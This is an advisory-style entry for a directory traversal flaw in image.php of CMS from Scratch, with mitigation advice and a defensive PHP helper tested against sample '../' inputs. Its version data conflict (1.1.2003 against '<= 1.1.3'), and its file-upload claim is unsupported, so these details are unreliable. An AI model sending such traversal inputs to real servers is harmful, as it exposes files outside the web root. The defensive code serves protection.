Vendor: CMS from Scratch
By: Stack
CVSS: 7.5 (HIGH)
Local Directory Traversal
CWE: 22 (Path Traversal)
Product Name: CMS from Scratch
Affected Version From: 1.1.2003
Affected Version To: 1.1.2003
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
CMS from Scratch <= 1.1.3 (image.php) Local Directory Traversal Vulnerability
A vulnerability in CMS from Scratch version 1.1.3 (image.php) allows an attacker to traverse the local directory structure and access sensitive files. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters (e.g. '../') to the vulnerable application. This will allow the attacker to access files outside of the web root directory. Additionally, an attacker can upload a malicious PHP file to the web server and execute it.
Mitigation:
Mitigate this vulnerability by validating and sanitizing user input before it is used in file system operations, so that a requested path cannot resolve to a file outside the intended directory.
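
One way to apply this validation is sketched below, as an added example that is not CMS from Scratch's code. The page does not show image.php, so the helper name `resolve_image_path`, the base directory and the extension allowlist are assumptions.

```php
<?php
// Added example (not CMS from Scratch code). Hypothetical helper that confines
// a user-supplied file name to one base directory before any file system use.

function resolve_image_path(string $baseDir, string $requested): ?string
{
    // Reject NUL bytes and empty names outright.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }

    // Allowlist of extensions (assumption: the endpoint only serves images).
    $ext = strtolower(pathinfo($requested, PATHINFO_EXTENSION));
    if (!in_array($ext, ['png', 'jpg', 'jpeg', 'gif'], true)) {
        return null;
    }

    // Canonicalize both paths. realpath() resolves '..', '.', and symlinks,
    // and returns false if the target does not exist.
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $full === false) {
        return null;
    }

    // The resolved path must sit under the base directory. The trailing
    // separator stops /srv/images_private from matching /srv/images.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0 || !is_file($full)) {
        return null;
    }
    return $full;
}

// Constructed sample input: a temporary directory tree built for the demo.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'trav_demo_' . getmypid();
mkdir($root . '/images', 0700, true);
file_put_contents($root . '/images/logo.png', 'img');
file_put_contents($root . '/secret.png', 'outside the image directory');

foreach (['logo.png', '../secret.png', 'logo.png/../../secret.png', 'logo.php'] as $name) {
    $path = resolve_image_path($root . '/images', $name);
    echo str_pad($name, 28), $path === null ? 'rejected' : 'served', PHP_EOL;
}
```

The check compares canonical paths instead of stripping `../` from the input, so encoded or nested traversal sequences that survive string filtering are still rejected once the path is resolved.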